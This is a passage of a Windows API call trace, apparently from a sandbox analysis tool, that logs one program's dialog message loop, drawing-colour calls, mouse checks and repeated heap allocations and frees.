(hWnd=0xc0170, nIndex=-21) returned 0 [0273.731] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.731] SetBkColor (hdc=0x550107ac, color=0xf0f0f0) returned 0xffffff [0273.731] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.731] NtdllDialogWndProc_W () returned 0x0 [0273.731] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.731] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.731] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.731] SetBkColor (hdc=0x550107ac, color=0xf0f0f0) returned 0xf0f0f0 [0273.731] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.731] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.731] GetWindowLongW (hWnd=0x7010a, nIndex=-21) returned 7 [0273.731] NtdllDialogWndProc_W () returned 0x0 [0273.732] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.732] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.732] GetWindowLongW (hWnd=0x7010a, nIndex=-21) returned 7 [0273.732] NtdllDialogWndProc_W () returned 0x0 [0273.732] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0273.732] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8dfb04) returned 1 [0273.732] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.732] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.732] GetWindowLongW (hWnd=0x7015e, nIndex=-21) returned 8 [0273.732] GetWindowLongW (hWnd=0x7015e, nIndex=-21) returned 8 [0273.732] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.732] GetWindowLongW (hWnd=0x7015e, nIndex=-16) returned 1342179332 [0273.732] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.732] GetSysColor (nIndex=8) returned 0x0 [0273.732] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0273.732] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xffffff [0273.735] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.735] NtdllDialogWndProc_W () returned 0x1 [0273.735] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.735] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.735] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.735] SetBkColor (hdc=0x630106f8, color=0xf0f0f0) returned 0xffffff [0273.735] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.735] NtdllDialogWndProc_W () returned 0x0 [0273.736] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.736] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.736] GetWindowLongW (hWnd=0x7015e, nIndex=-21) returned 8 [0273.736] GetWindowLongW (hWnd=0x7015e, nIndex=-21) returned 8 [0273.736] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.736] GetWindowLongW (hWnd=0x7015e, nIndex=-16) returned 1342179332 [0273.736] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.736] GetSysColor (nIndex=8) returned 0x0 [0273.736] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0273.736] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xffffff [0273.737] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.737] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.737] GetWindowLongW (hWnd=0x7015e, nIndex=-21) returned 8 [0273.737] GetWindowLongW (hWnd=0x7015e, nIndex=-21) returned 8 [0273.737] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.737] GetWindowLongW (hWnd=0x7015e, nIndex=-16) returned 1342179332 [0273.737] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.737] GetSysColor (nIndex=8) returned 0x0 [0273.737] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0273.737] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xf0f0f0 [0273.737] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.737] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.737] GetWindowLongW (hWnd=0x7015e, nIndex=-21) returned 8 [0273.737] GetWindowLongW (hWnd=0x7015e, nIndex=-21) returned 8 [0273.737] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.737] GetWindowLongW (hWnd=0x7015e, nIndex=-16) returned 1342179332 [0273.737] GetSysColor (nIndex=15) returned 0xf0f0f0 [0273.737] GetSysColor (nIndex=8) returned 0x0 [0273.737] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0273.737] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xf0f0f0 [0273.740] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0273.740] TranslateMessage (lpMsg=0x8dfb04) returned 0 [0273.740] DispatchMessageW (lpMsg=0x8dfb04) returned 0x0 [0273.740] GetForegroundWindow () returned 0xc0170 [0273.740] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.740] GetCursorPos (in: lpPoint=0x8df940 | out: lpPoint=0x8df940*(x=558, y=531)) returned 1 [0273.740] ScreenToClient (in: hWnd=0xc0170, lpPoint=0x8df940 | out: lpPoint=0x8df940) returned 1 [0273.740] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x24) returned 0xeebad0 [0273.740] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb818 [0273.740] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.740] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.740] GetAsyncKeyState (vKey=1) returned 0 [0273.740] GetAsyncKeyState (vKey=2) returned 0 [0273.740] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.740] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20270 [0273.740] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7b8 [0273.740] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b38 [0273.741] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7b8 | out: hHeap=0xcc0000) returned 1 [0273.741] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf1fed8 [0273.741] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7b8 [0273.741] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed92b0 [0273.741] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33b88 [0273.741] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b88 | out: hHeap=0xcc0000) returned 1 [0273.741] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33b88 [0273.741] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b88 | out: hHeap=0xcc0000) returned 1 [0273.741] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed92b0 | out: hHeap=0xcc0000) returned 1 [0273.741] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b88 [0273.741] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x214) returned 0xd07158 [0273.741] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33b08 [0273.741] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ac8 [0273.741] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed92b0 [0273.741] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ac8 | out: hHeap=0xcc0000) returned 1 [0273.741] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed92e0 [0273.741] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7e8 [0273.741] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb800 [0273.743] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33ac8 [0273.743] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.743] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed92b0 | out: hHeap=0xcc0000) returned 1 [0273.743] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.743] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed92b0 [0273.743] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb830 [0273.743] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.743] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33ad8 [0273.743] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.743] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.743] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb830 | out: hHeap=0xcc0000) returned 1 [0273.743] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.743] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf1feb0 [0273.743] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb830 [0273.743] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.743] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33ab8 [0273.743] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.743] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x6) returned 0xf33ad8 [0273.743] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x82) returned 0xd0af48 [0273.744] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.744] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd0af48 | out: hHeap=0xcc0000) returned 1 [0273.744] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.744] CreateAcceleratorTableW (paccel=0xf33ad8, cAccel=1) returned 0x1b016b [0273.744] GetForegroundWindow () returned 0xc0170 [0273.744] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.744] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ab8 | out: hHeap=0xcc0000) returned 1 [0273.744] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb830 | out: hHeap=0xcc0000) returned 1 [0273.744] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf1feb0 | out: hHeap=0xcc0000) returned 1 [0273.744] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.744] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.744] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ab8 [0273.744] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ab8 | out: hHeap=0xcc0000) returned 1 [0273.744] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40dc0 [0273.744] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.744] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ab8 [0273.744] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb830 [0273.744] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33ad8 [0273.744] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.744] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb818 | out: hHeap=0xcc0000) returned 1 [0273.744] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.744] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xeebad0 | out: hHeap=0xcc0000) returned 1 [0273.744] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb830 | out: hHeap=0xcc0000) returned 1 [0273.745] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.745] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ab8 | out: hHeap=0xcc0000) returned 1 [0273.745] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf1feb0 [0273.745] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb830 [0273.745] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33ab8 [0273.745] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb818 [0273.745] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.745] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.745] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.745] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.745] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.745] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.745] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.745] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.745] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.745] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.745] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.745] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.745] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.745] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.745] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.745] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.745] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.745] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.746] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.746] Sleep (dwMilliseconds=0x0) [0273.746] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.746] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.746] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.746] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.747] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.747] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.747] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.747] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.747] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.747] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.747] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.747] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.747] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.747] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.747] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.747] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.747] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.747] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.747] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.747] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.747] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.747] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.747] Sleep (dwMilliseconds=0x0) [0273.748] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.748] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.748] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.748] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.748] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.748] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.748] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.748] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.748] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.748] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.748] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.748] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.749] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.749] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.749] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.749] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.749] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.749] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.749] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.749] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.749] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.749] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.749] Sleep (dwMilliseconds=0x0) [0273.750] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.750] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.750] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.750] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.750] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.750] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.750] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.750] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.750] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.750] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.750] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.750] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.750] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.750] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.750] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.750] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.750] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.750] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.750] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.750] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.750] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.750] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.751] Sleep (dwMilliseconds=0x0) [0273.752] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.752] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.752] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.752] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.752] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.752] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.752] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.752] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.752] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.752] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.752] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.752] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.752] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.752] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.752] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.752] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.752] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.752] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.752] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.752] 